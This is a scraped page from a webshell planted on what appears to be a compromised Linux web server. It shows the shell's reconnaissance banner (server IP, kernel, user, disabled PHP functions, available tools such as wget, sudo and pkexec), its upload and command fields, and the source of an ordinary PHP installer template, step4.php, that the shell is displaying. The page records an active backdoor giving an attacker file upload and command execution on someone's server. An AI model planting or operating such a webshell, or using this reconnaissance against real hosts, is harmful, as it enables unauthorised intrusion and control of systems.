403Webshell
Server IP : 156.238.232.47  /  Your IP : 216.73.216.150
Web Server : nginx/1.25.3
System : Linux C202504152095410 3.10.0-1160.119.1.el7.x86_64 #1 SMP Tue Jun 4 14:43:51 UTC 2024 x86_64
User : www ( 1000)
PHP Version : 8.3.25
Disable Function : passthru,exec,system,putenv,chroot,chgrp,chown,shell_exec,popen,proc_open,pcntl_exec,ini_alter,ini_restore,dl,openlog,syslog,readlink,symlink,popepassthru,pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,imap_open,apache_setenv
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /www/wwwroot/2026_02_11_01/install_52EAuGyHAGBKwTdLxPE4/templates/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /www/wwwroot/2026_02_11_01/install_52EAuGyHAGBKwTdLxPE4/templates/step4.php
<!doctype html>
<html>
<head>
  <meta charset="UTF-8" />
  <meta name="renderer" content="webkit">
  <meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1" >
  <meta http-equiv="Content-Language" content="zh-cn"/>
  <meta content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0" name="viewport" />
  <title><?php echo $Title; ?> - <?php echo $Powered; ?></title>
  <link rel="stylesheet" href="./css/install.css?v=v1.6.4" />
  <script src="./js/jquery.js?v=v1.6.4"></script> 
  <script src="./../public/plugins/layer-v3.1.0/layer.js?v=v1.6.4"></script> 
</head>
<body>
  <div class="wrap">
    <?php require './templates/header.php';?>
    <section class="section">
      <div class="blank30"></div>
      <div class="go go3"></div>
      <div class="blank30"></div>
      <div class="main ccaz">
        <div class="wraper">
          <div class="install" id="log">
            <div class="blank10"></div>
            <ul id="loginner">
            </ul>
          </div>
          <div class="bottom tac"> <a href="javascript:;" class="btn_old" id="loading"><img src="./images/loading.gif" align="absmiddle" />&nbsp;正在安装...</a> </div>
        </div>
      </div>
    </section>
    <script type="text/javascript">
      var n=-1;
      var data = <?php echo json_encode($_POST);?>;
      $.ajaxSetup ({ cache: false });
      function reloads(n) {
          var url =  "<?php echo $_SERVER['PHP_SELF']; ?>?step=4&install=1&n="+n;
          $.ajax({
              type: "POST",   
              url: url,
              data: data,
              dataType: 'json',
              beforeSend:function(){
              },
              success: function(msg){
                  if (-1 == msg) {
                      return false;
                  } else if (null == msg) {
                      $('#loading').hide();
                      layer.alert('安装过程中断,请尝试F5刷新!', {icon: 5});
                  }
                  if(msg.n=='999999'){
                      $('#dosubmit').attr("disabled",false);
                      $('#dosubmit').removeAttr("disabled");        
                      $('#dosubmit').removeClass("nonext");
                      setTimeout('gonext()',2000);
                  }
                  if(msg.n>=0){
                      $('#loginner').append(msg.msg); 
                      reloads(msg.n); 
                  }else{
                      $('#loading').hide();
                      $('#loginner').append(msg.msg); 
                      layer.alert(msg.msg, {icon: 5});
                  }
              }
          });
      }
      function gonext(){
          window.location.href='<?php echo $_SERVER['PHP_SELF']; ?>?step=5';
      }
      $(document).ready(function(){
          reloads(n);
      })
  </script> 
  </div>
  <div class="blank30"></div>
  <?php require './templates/footer.php';?>
</body>
</html>

Youez - 2016 - github.com/yon3zu
LinuXploit